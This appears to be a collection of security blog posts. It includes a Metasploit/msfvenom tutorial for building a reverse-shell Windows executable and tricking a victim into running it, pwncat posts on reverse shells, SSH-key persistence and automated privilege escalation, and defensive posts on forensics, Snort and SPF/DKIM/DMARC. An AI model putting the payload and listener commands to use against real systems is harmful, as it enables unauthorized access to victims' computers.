Windows Exploit via Metasploit or MSFVENOM

Basic Idea

• Creating Malicious Payload.
• Trick Victim to execute it.
• Perform Exploit.

Let's dig deeper (Only for Educational Purposes)

Metasploit

Hacking, exploits, vulnerabilities – these are the keywords for Metasploit. Metasploit is a massive database/framework which is used by hackers and security professionals to attack or audit environments.

Metasploit holds thousands of exploits, payloads, and scanners which can be used to hack computers, web servers, and other digital environments. Metasploit contains various backdoors which can be inserted at targeted environments. These backdoors will grant the security professional or hacker access to the infected device.

• Step 1: Use ifconfig to find your IP address. 

Getting your IP

• Step 2: Now create a malicious payload using MSF venom. Use command - msfvenom –p windows/meterpreter/reverse_tcp LHOST=<your_ip> lport=4444 –f exe -o payload.exe

Creating Backdoor/Malware

• Step 3: After executing the command, you will see a payload created in the current working directory.
• Step 4: Deliver this payload to the victim and trick the victim into executing the payload. 

This will only work if the victim's virus protection is off. 

Turning off virus protection

• Step 5: Once the victim runs the payload, we can gain access to the victim's machine.

Meanwhile, we have to start a listener on our machine to receive a connection for the victim.

• Step 6: Setup your Metasploit connection. Command - msfconsole. In Metasploit type, 

msf > use exploit/multi/handler

msf exploit(handler) > set payload windows/meterpreter/reverse_tcp

msf exploit(handler) > set LHOST 192.168.29.146

msf exploit(handler) > set LPORT 4444

msf exploit(handler) > exploit

Here LHOST will be your IP address.

• Step 7: Check for active sessions using command sessions. In our case session id is 1.

• Step 8: Now to execute that particular session, use command sessions -i <session_id>.

• Step 9: Let’s Reconnaissance the System Configuration using the command: sysinfo (Provides information about the target).

• You can also take a screenshot of the victim's screen by using the command screenshot.

We hope this helps. If any suggestions or doubts you can add a comment and we will reply as soon as possible.

Dive Deep into pwncat - Download or Upload Files

pwncat is a command and control framework that turns a basic reverse or bind shell into a fully-featured exploitation platform.

Uploading Files

Usually transferring a file from our host machine to the victim machine is so hard. It involves you hosting a python server and then using services like wget in Linux to download the file. 

But pwncat does all the steps with ease. It does not require you to host an HTTP server by python or need wget to get the file. You can simply upload the file by upload filename.

In the CTF competition, we need to upload winpeas or linpeas for privilege escalation. So pwncat save a lot of time for you to transfer file. 

Uploading File Example

In the picture attached the /etc/hosts file is uploaded to /tmp/hosts of the victim machine from the host machine.

Downloading Files

Downloading files is also easy in pwncat. You can easily download a file from the victim machine to the host machine. This is usually useful when you want to edit a file in your host machine. 

To edit that file to escalate privileges, the attacker should download the file, edit it and upload it back. For example, you find a cron job executing every minute and the file is owned by the root user. Your current user has edit privilege and now you can download the file in your machine and edit with ease with pwncat. 

Usually editing on a remote machine is tuff. Here pwncat helps you to download the file and then you can reupload the edited file and set up a listener so that we can get a reverse shell when the cron job is again executed.

Downloading File Example

pwncat is a good tool in CTF like environment but make sure you do not use it in exams like OSCP because the automation capabilities such as privilege escalate to other users with just a command and auto enumeration are marked as illegal by offensive security. In CTF pwncat is a much better tool than netcat.

CLICK HERE TO KNOW MORE ABOUT PWNCAT

We hope this helps. If any suggestions or doubts you can add a comment and we will reply as soon as possible.

Dive Deep into pwncat - Privilege Escalation & Persistence

pwncat is a command and control framework that turns a basic reverse or bind shell into a fully-featured exploitation platform.

Persistence

Persistence Example

Pwncat has this feature of keeping persistence on the target machine. Pwncat adds persistence to the victim machine. In case if the connection is lost and we need to regain the shell it’s a burden as we need to enter the ssh password and during situations like CTF, it is a huge time loss. 

What we can do is upload our public key to the authorized_keys of the server so that you can access it without typing your account password all the time. Pwncat automates this process with the help of the persist module. This will add our public key to authorized_keys of the victim machine so that we need not use a password to log in again. 

You can also see the status of your persistence method with the persist --status command.  After our operation or getting the flag, if we need to remove the traces of our action we can easily do that by persist --clean. This will eventually remove our authorized key from the victim machine. 

If you want to track all the operations on the remote machine, tamper in pwncat help you track your activity

Tamper Example

Also, if you want to revert all the changes you made on the remote target you can do it with a single command tamper --revert --all

Revert all changes

Privilege Escalation

Privilege Escalation Methods

Pwncat can list out privilege escalation methods. In the figure, we can see that pwncat escalate privilege to developer user without password using the help of vim. Pwncat has the ability to attempt automated privilege escalation methods. A number of methods are implemented by default such as:

• Set UID Binaries
• Sudo (with and without password)
• Screen (CVE-2017-5618)
• DirtyCOW

Escalating user to sysadmin

Pwncat can also automatically detect and fix mismatched EUID and UID after an attempted privilege escalation. In the attached picture we can see that we need to escalate the user to sysadmin. 

-u flag stands for the user and -e flag stands for escalating. Here we are escalating our privileges to that of sysadmin with just one command. We can see that we elevated our normal user to the developer with help of vim misconfiguration and then elevated to sysadmin user with help of setuid mismatch.

JSON File of GTBO Bins

Pwncat does this in the same way as a user would use GTFO bins to find privesc methods. The pwncat developers have a JSON file that has a lot of information about different privesc methods.

pwncat is a good tool in CTF like environment but make sure you do not use it in exams like OSCP because the automation capabilities such as privilege escalate to other users with just a command and auto enumeration are marked as illegal by offensive security. In CTF pwncat is a much better tool than netcat.

CLICK HERE TO KNOW MORE ABOUT PWNCAT

We hope this helps. If any suggestions or doubts you can add a comment and we will reply as soon as possible.

Dive Deep into pwncat - Enumeration & Busy Box

pwncat is a command and control framework that turns a basic reverse or bind shell into a fully-featured exploitation platform.

Utilize your connection for enumeration of the target machine

The first thing that we do after we receive a connection is to enumerate and find about the users, groups, and other information. The thing we focus to achieve here is to find a way to elevate to higher privileged users and it is usually so hectic.  Pwncat can do this in an automated manner.

The enumeration in pwncat is achieved through the enumerate.* modules. Enumeration can be run individually or you can use one of the automated enumeration groups. By default, enumeration modules run only once and their results are cached in the database. The enumerate.gather module is used to gather enumeration facts from all other enumeration modules. 

# Enumerate only SUID and File Capability enumeration types

(local) pwncat$ run enumerate.gather types=file.suid,file.caps

# Enumerate facts from all available modules

(local) pwncat$ run enumerate.gather

enumerate.quick module enumerates some useful types of enumeration data, but is intended to not take much time. Both enumerate.gather and enumerate.quick implement the output parameter which allows you to write the enumeration results to a markdown file instead of standard output.

# Output a markdown formatted report to results.md

(local) pwncat$ run enumerate.auto output=results.md

Example for SUDO

So the above image depicts how pwncat gathered facts about sudo and it was able to find and able to elevate the privileges to sudo or root user with the help of vim as it is showed NOPASSWD.

Busy Box

Install BusyBox

BusyBox combines tiny versions of many common UNIX utilities into a single small executable. This can help you get all the essential utilities into the machine if it’s not available on the target machine. 

BusyBox provides a fairly complete environment for any small or embedded system. BusyBox has been written with size-optimization and limited resources in mind. In a few hundred kb size file, one could get a huge list of functionalities on the system.

pwncat is a good tool in CTF like environment but make sure you do not use it in exams like OSCP because the automation capabilities such as privilege escalate to other users with just a command and auto enumeration are marked as illegal by offensive security. In CTF pwncat is a much better tool than netcat.

CLICK HERE TO KNOW MORE ABOUT PWNCAT

We hope this helps. If any suggestions or doubts you can add a comment and we will reply as soon as possible.

pwncat Basics

pwncat is a command and control framework that turns a basic reverse or bind shell into a fully-featured exploitation platform.

The basic mode of pwncat

• In Terminal Mode: It acts as a normal terminal that we obtain by a reverse shell.
• In pwncat CLI (command-line interface) Mode: Here, we will get all other special features that pwncat has to offer. 

Ctrl + D helps you to move between both modes.

Establishing a bind shell

Bind shell is a type of shell in which the target machine opens up a connection port or listener on the victim machine and waits for an incoming connection. Here the target machine is waiting for connection and as soon as the connection is active. It executes /bin/bash which gives the attacker access to the victim machine. 

Bind Shell Comparison

Establishing a reverse shell

A reverse shell is a shell session established on a connection that is initiated from a remote machine, not from the localhost. Here we can see that just like netcat we can receive connections by using -lp which means listen on a port. But the shell that we obtain has much more features than an ordinary shell that we get with the help of netcat.

Reverse Shell Comparision

All kinds of connections are possible via pwncat

Connection Example

pwncat is a good tool in CTF like environment but make sure you do not use it in exams like OSCP because the automation capabilities such as privilege escalate to other users with just a command and auto enumeration are marked as illegal by offensive security. In CTF pwncat is a much better tool than netcat.

CLICK HERE TO KNOW MORE ABOUT PWNCAT

We hope this helps. If any suggestions or doubts you can add a comment and we will reply as soon as possible.

Introduction to pwncat

pwncat is a command and control framework that turns a basic reverse or bind shell into a fully-featured exploitation platform. This is somewhat similar to netcat. We can use this tool to get the reverse shell from the victim's machine.

A reverse shell is a shell session established on a connection that is initiated from a remote machine, not from the localhost. 

A bind shell is a type of shell in which the target machine opens up a communication port or a listener on the victim machine and waits for an incoming connection.

Netcat is a very good tool to receive connections and enumerate further but there are some drawbacks. To bind a stabilize the shell in netcat works well. However, the added steps to get a reverse shell are repetitive after a while. There is also a  danger of losing your remote shell by accidentally pressing “C-c” prior to gaining raw access is high. 

Pwncat rectified the problem by running a script on the target machine which contains all the commands soon after the connection is established. It gives a terminal that has more features and is not easily breakable. It has a huge number of features, rather than running a script on the target machine to get an unbreakable and fully functional shell.

Some of the important features of pwncat:

• Utilize your connection for enumeration of the target machine.
• File upload/download.
• Automatic persistence installation.
• Automated privilege escalation.

Installation

pwncat requires python and pip.

• Clone the repository - https://github.com/calebstewart/pwncat.
• Redirect to the repository.

cd pwncat

• It is recommended to use a virtual environment. However, this can be done easily with the Python3 venv module:

python -m venv env

source env/bin/activate

python setup.py install

• If pip is not installed, you can install pwncat with the provided setup scripts:

python setup.py --user install

• To verify installation run pwncat --help.

pwncat is successfully installed

pwncat is a good tool in CTF like environment but make sure you do not use it in exams like OSCP because the automation capabilities such as privilege escalate to other users with just a command and auto enumeration are marked as illegal by offensive security. In CTF pwncat is a much better tool than netcat.

CLICK HERE TO KNOW MORE ABOUT PWNCAT

We hope this helps. If any suggestions or doubts you can add a comment and we will reply as soon as possible.

First Responder in Cyber Incident, Explained!

Roles of First Responder

1. Identifying the crime scene
2. Protecting the crime scene
3. Preserving temporary and fragile evidence
4. Collecting the complete information about the incident
5. Documenting all the findings
6. Packaging and transporting the electronic evidence.

Toolkit

1. A first responder toolkit is a set of tools that helps first responders collect genuine and presentable evidence. 
2. It helps first responders to understand the limitations and capabilities of electronic evidence at the time of collection.
3. First responders have to select the trusted computer forensics tool that gives output specific information.

Creating Toolkit

1. Create a trusted forensic computer or testbed

• Choose the related operating system.
• Completely sanitize the forensics computer
• Install the operating system and required software
• Update and patch the forensics computer
• Install a file integrity monitor to test the integrity of the file system

2. Document the details of the forensics computer

• Version name and type of the operating system
• Name and types of different software
• Name and types of the installed hardware

3. Document the summary of the collected tools

• It helps the first responder to understand how a tool works
• The summary comprises:
• Acquisition of the tool
• Detailed description of the tool
• Working of the tool
• Tool dependencies and the system effects

4. Test the tools

• Test the collected tools on the forensics computer and examine the performance and output
• Examine the affects of the tool on the forensics computer

Tools

• Notebook Computers - Licensed Software, Bootable CD, External hard drives and Network cables.
• Software tools - Encase Forensics, Forensic Tool Kit (FTK), ProDiscover, Hex Workshop, X-Ways Forensics.
• Hardware Tools - Paraben forensics hardware, Digital Intelligence forensic hardware, Tableau Hardware accelerator, Wiebetech forensics hardware tools, Logicube forensics hardware tools.

We hope this helps. If any suggestions or doubts you can add a comment and we will reply as soon as possible.

SNORT - Intrusion Detection/Prevention Systems

IDS stands for Intrusion Detection System and IPS stands for Intrusion Prevention System. IDS and IPS work on the same principle. They analyze packets that are coming from the outside network based on some set of rules from the known cyberattacks database. IDS/IPS both analyze the signature of the packets from the know cyberattack database. 

The difference between IDS/IPS is that IDS only detects the incoming attack and alerts the administrator to take action against the attack while the IPS not only detects but also stops the packet from being delivered based on sets of rules. 

Both IDS/IPS are kind of similar in the process as an antivirus which compares the signature of the application with the list of all malicious signatures that is stored in it. Most often IDS is deployed behind the firewall on the edge of the network whereas IPS will generally be placed at an edge of the network such as immediately inside an Internet Firewall. IPS requires more computational power for performing network prevention and detection. 

One most used IDS/IPS is SNORT. Snort is an open-source network intrusion detection system and intrusion prevention system.

Installation

Firstly, we need to make sure the OpenSSH server is installed on ubuntu which is by default installed but in case if it is not installed you can install it using the command apt-get install openssh-server.

• Snort is available in the ubuntu package. To install, use the command, apt-get install snort*.

SNORT installation command

• Meanwhile, you will get a pop-up asking on which interface you want to configure the SNORT. This will set up the network with its CIDR. 

Set up Interface

Your interface name will be different. Run ifconfig or ip a to check the name of the interface.

With these two simple steps, SNORT will be installed. Some files will be created in /etc/snort/ which is used to set up the SNORT application as IDS.

SNORT files location

Configuring SNORT as IDS:

• Open the configuration file which is located at /etc/snort/snort.conf as a super user. You can use any text editor to open the file. 
• Set the HOME_NET variable which is nothing but your network's IP. 

Change the HOME_NET value

• After setting the HOME_NET variable, there are some sets of rules that are predefined for different services like SSH, FTP, Nmap, etc. 
• A glimpse of rules is shown below which are located in /etc/snort/rules/. As the first rule, we see it says to alert the user if any packet comes to the HOME_NET variable on port 21.

FTP rules set

• Now to make this rule active we need to start SNORT using the following command sudo snort -T -c /etc/snort/snort.conf -I ens33 (your interface).

Command to activate

• To start the SNORT application, we need to run the following command sudo snort -A console -q -u snort -g snort -c /etc/snort/snort.conf -i ens33.

Command to initiate

• After this, whenever a request which could be an attack according to the rules. It will display the alert on the terminal.

We hope this helps. If any suggestions or doubts you can add a comment and we will reply as soon as possible.

DMARC Record - Explained

SPF, DMARC and, DKIM are the email security protocols used by companies or businesses to prevent various phishing attacks. Phishing and email spam are the biggest opportunities for hackers to enter the network. If a user clicks on a malicious email attachment, it can compromise an entire enterprise with ransomware, crypto-jacking scripts, data leakages, or privilege escalation exploits.

Source - From the Internet

DMARC is an acronym for “Domain-based Message Authentication, Reporting, and Conformance”. It’s an email authentication, policy, and reporting protocol that’s actually built around both SPF and DKIM. It has three basic purposes:

• Verifies that a sender’s email messages are protected by both SPF and DKIM,
• Tells the receiving mail server what to do if neither of those authentication methods pass, and
• Provides a way for the receiving server to report back to the sender about messages that pass and/or fail the DMARC evaluation (it is kinda a big fellow in the ground).

Since DMARC uses both SPF and DKIM, you may wonder why it’s even necessary. Well, it’s simple: DMARC basically builds on SPF and DKIM to ensure that, when an email is received, the information contained in both records matches the “friendly from” domain (e.g., me@my-domain.com) that the user actually sees and the "from address" that is in the message’s header. This is what the folks at Dmarcian, a company founded by one of the primary authors of the DMARC specification, call “Identifier Alignment.”

CHECKING FOR DMARC RECORDS

• Go to DMARC Check Tool.

DMARC Check Tool by MX Toolbox

• Enter your domain name for which you want to check DMARC record. For example, GitHub.com
• If you get the results in the following way congrats you already have your DMARC configured and your webmail is safe from phishing.

DMARC Record Example

If the website does not have the Records, check the below section.

CREATE DMARC RECORDS

Once you have both SPF and DKIM in place, then it’s time to create your DMARC record. The easiest way to do this is to use a DMARC wizard. There are many sites that offer such a tool: MXToolbox, DMARC Analyzer (requires to sign up), Dmarcian, and more. The Dmarc.org site also provides a list of utilities for generating DMARC records, DMARC lookup and parsing, message validation, and more. Most of these sites also have tools to validate your DMARC record once DNS propagation has taken place.

Regardless of the tool you use, a DMARC record utilizes a number of “tags”. There are really only 2 tags that are actually required: “v” and “p”. Other tags are purely optional, and DMARC experts kind of disagree on which optional tags are recommended and which are not. Let’s look at the required tags first:

• v - This is the version tag, just like with SPF. It MUST be “DMARC1” and be the first tag listed in the DMARC record.
• p - This is the policy tag. It tells the receiving server which policy to apply to a message that fails DMARC: “none” or do nothing to a message, “quarantine” a message, or “reject” the message.

Optional tags include the following:

• pct - This is the percent of suspicious messages that the DMARC policy applies to. Of course, the default is 100, but it can be set to whatever you want it to be.
• rua=mailto:address@company.com - This tag tells receiving servers where to send aggregate reports. These reports provide visibility into the health of the sending server by helping to identify potential authentication issues or malicious activity. These reports are sent daily, so, ideally, if you want reports sent, they’re sent to a mail address set up specifically FOR these reports and not a domain admin account.
• fo - This tag lets receiving servers know that samples of messages that fail either SPF and/or DKIM should be returned to the sender. There are four value options for this tag:
• 0: Generate a DMARC failure report if both SPF and DKIM fail to produce a “Pass” result. This is the default option.
• 1: Generate a DMARC failure report if both SPF and DKIM produce something other than a “Pass” result. This is the recommended option.
• d: Generate a DKIM failure report if the message had a DKIM signature that failed the evaluation, regardless of why.
• s: Generate an SPF failure report if the message failed SPF evaluation, regardless of why.

So what does a DMARC record look like? Let's look at the record for SmarterTools:

v=DMARC1; p=none; rua=mailto:fbl@smartertools.com; fo=1

As you can see, we have both required tags: v and p, set, but a few optional tags as well. For the policy tag (p) it is set to “none”. So, we’re basically collecting feedback on messages but we’re not necessarily “interrupting the flow of messages”, even if they fail SPF and/or DKIM. From a DMARC rollout perspective, this is a prudent course of action. That’s because while DMARC is a serious way to catch potential phishing emails, it’s not a widely adopted policy. Therefore, many domains don’t have SPF or DKIM set up, let alone both. So for the time being, simply watching messages and seeing their disposition, without quarantining or outright rejecting them, is the best way to go for DMARC implementation.

You might also interested in,

• SPF Records
• DKIM Records
• Are these records really necessary?

We hope this helps. If any suggestions or doubts you can add a comment and we will reply as soon as possible.

Are SPF, DKIM, and DMARC records Necessary

SPF, DMARC and, DKIM are the email security protocols used by companies or businesses to prevent various phishing attacks. Phishing and email spam are the biggest opportunities for hackers to enter the network. If a user clicks on a malicious email attachment, it can compromise an entire enterprise with ransomware, crypto-jacking scripts, data leakages, or privilege escalation exploits.

Source - From the Internet

Having those three records in place is considered the best practice. As the saying goes, “An ounce of prevention is worth a pound of cure.” For email, this has never been more true. Having all three records in place shows that your email domains are truly who they say they are. It also shows that you as an administrator, and your domain administrators as well, are all serious about ensuring you’re following best practices and doing your part to prevent spam, phishing, and other email security issues.

You might also interested in,

• SPF Records
• DKIM Records
• DMARC Records

We hope this helps. If any suggestions or doubts you can add a comment and we will reply as soon as possible.

DKIM Record - Explained

SPF, DMARC and, DKIM are the email security protocols used by companies or businesses to prevent various phishing attacks. Phishing and email spam are the biggest opportunities for hackers to enter the network. If a user clicks on a malicious email attachment, it can compromise an entire enterprise with ransomware, crypto-jacking scripts, data leakages, or privilege escalation exploits.

Source - From the Internet

DKIM is an acronym for DomainKeys Identified Mail. When sending an email from a server that has DKIM configured, the server will hash the body and the header of the email separately. It will then,  create a signature with a private key which will send along with the email.

When the receiver receives the email, it will do a DNS request to the domain that the email claim it is from. By doing so, the receiver will get the public key which is the DKIM-record. It will then with the key can verify the signature is correct or not, and by doing so it will confirm that the sender is genuine and the mail has not been manipulated on its way there.

CHECKING FOR DKIM RECORDS

• Go to DKIM Records Lookup.

DKIM Records Lookup by MX Toolbox

• Enter the domain name and selector (A DKIM selector is text, that is added with the domain to create a unique DNS record used during DKIM. This allows multiple keys to exist under one domain which allows for different signatures to be created by different systems, date ranges, or third-party services). For example, GitHub.com.

• If you get the results in the following way that means the website has DKIM records and it's safe.

If the website does not have the Records, check the below section.

Create DKIM Records

Ideally, your mail server will provide a tool that allows you to create the information right on the server. (For SmarterMail users, information on “Setting Up Email Signing” is available in the Help documentation). Regardless of how you create your record, the following information is part of it:

• s - This is the selector and it indicates the record “name” used with the domain to locate the public key in DNS. The sender creates this (again, ideally automatically).
• d - This indicates the domain, used by the sender. Used with the selector record and helps locate the public key.
• p - This is the actual public key that gets published to DNS as part of the record. Therefore, it will look like a random set of upper and lower case letters, numbers, and some punctuation marks.

These are the three key parts of a DKIM record. Other tags are available, but these three are the most commonly used. Therefore, a typical DKIM record will look like this:

2B8U4DAB93D58YR._domainKey.yourdomain.com;

p=MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQC1TaNgLlSyQMNWVLNLvyY/neDgaL2oqQE8T5illKqCgDtFHc8eHVAU+nlcaGmrKmDMw9dbgiGk1ocgZ56NR4ycfUHwQhvQPMUZw0cveel/8EAGoi/UyPmqfcPibytH81NFtTMAxUeM4Op8A6iHkvAMj5qLf4YRNsTkKAV

In the above, you’ll find the following:

• Selector (s): 2B8U4DAB93D58YR
• Domain (d): yourdomain.com
• Public Key (p): MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQC1TaNgLlSyQMNWVLNLvyY/neDgaL2oqQE8T5illKqCgDtFHc8eHVAU+nlcaGmrKmDMw9dbgiGk1ocgZ56NR4ycfUHwQhvQPMUZw0cveel/8EAGoi/UyPmqfcPibytH81NFtTMAxUeM4Op8A6iHkvAMj5qLf4YRNsTkKAV

The other information in the record will be added automatically, but it is generally the same regardless of how the record is created. (I.e., _domainKey).

You might also interested in,

• SPF Records
• DMARC Records
• Are these records really necessary?

We hope this helps. If any suggestions or doubts you can add a comment and we will reply as soon as possible.

SPF Record - Explained

SPF, DMARC and, DKIM are the email security protocols used by companies or businesses to prevent various phishing attacks. Phishing and email spam are the biggest opportunities for hackers to enter the network. If a user clicks on a malicious email attachment, it can compromise an entire enterprise with ransomware, crypto-jacking scripts, data leakages, or privilege escalation exploits.

Source - From the Internet

SPF is an acronym for “Sender Policy Framework”. As with all three checks, SPF is a DNS TXT record that specifies which IP addresses and/or servers are allowed to send email “from” that particular domain. It’s essentially like the return address that’s placed on a letter or postcard that lets the recipient know who sent the communication. The idea is that if they know who sent them the letter, the recipient is more likely to open it. 

Sender Policy Framework (SPF) hardens your DNS servers and restricts who can send emails from your domain. SPF can prevent domain spoofing. It enables your mail server to determine which message came from the verified domain. SPF has three major elements: a policy framework as its name implies, an authentication method, and specialized headers in the actual email that convey this information. SPF was first proposed with IETF standard 4408 back in 2006 and has been updated most recently to standard 7208 in 2014.

CHECKING FOR SPF RECORDS

• Go to SPF Record Check - Lookup SPF Records.

SPF Checker website by MX Toolbox

• Enter the domain name and search for the records. For Example, GitHub.com.
• If you get the results in the following way that means the website has SPF records and it's safe.

SPF Records of GitHub

If the website does not have the Records, check the below section.

Create SPF Records

An SPF record is a very simple string that can be easily created and added to DNS records by a domain administrator as a TXT entry. Few things to keep in mind:

• The SPF version being used.
• The IPs that are authorized to send an email for the domain.
• Any third-party domains that are authorized to send an email.
• An ending "all" tag indicates that the policy should be applied when a "receiving server" detects an IP/domain that’s not part of the SPF record.

v=spf1 ip4:22.23.24.25 include:another-domain-that-can-send-email-for-us.com -all

• v=spf1 - This simply states that version 1 of SPF is being implemented. There is no other version at this point, so this should always be “v=spf1”, at least until another version is released. (If you’re curious, there was another version at one time -- SenderID -- but it’s been discontinued.)
• ip4:22.23.24.25 - This is the IP address of the mail server and/or domain that’s authorized to send an email. Multiple IPs can be used. So if your mail provider rotates IPs, all IP addresses can be listed either individually (ip4:22.23.24.25 ip4:12.13.14.15) or through a CIDR range (ip4:22.23.24.0/20). Note that both IPv4 and IPv6 addresses should be listed if any used by the mail server.
• include:another-domain-that-can-send-email-for-us.com - This is a secondary domain that is authorized to send an email on behalf of the primary mail domain. If multiple domains are authorized, they should all be listed as separate “includes.” However, a maximum of 10 includes is allowed for any sending domain.
• all - The “all” tag basically tells the receiving server how it should handle all messages sent from a domain if it sees a domain in the header that’s not listed in the SPF record. There are a few options, and these options are dictated by the character that precedes the “all” tag. These are:
• -all (dash all) - This is a hard fail. This means that servers that aren’t listed in the SPF record aren’t recognized or authorized to send an email for the domain, so the email should be rejected by the receiving server.
• ~all (tilde all) - This is a soft fail. Basically, that means that the server isn’t listed in the SPF record, but it should not be flat-out rejected by the receiving server. Instead, the message will be marked as possible spam.
• +all (plus all) - THIS IS NOT RECOMMENDED. This tag essentially means any domain listed is authorized to send an email, even if it’s not listed in the SPF record.

You might also be interested in,

• DKIM Records
• DMARC Records
• Are these records really necessary?

We hope this helps. If any suggestions or doubts you can add a comment and we will reply as soon as possible.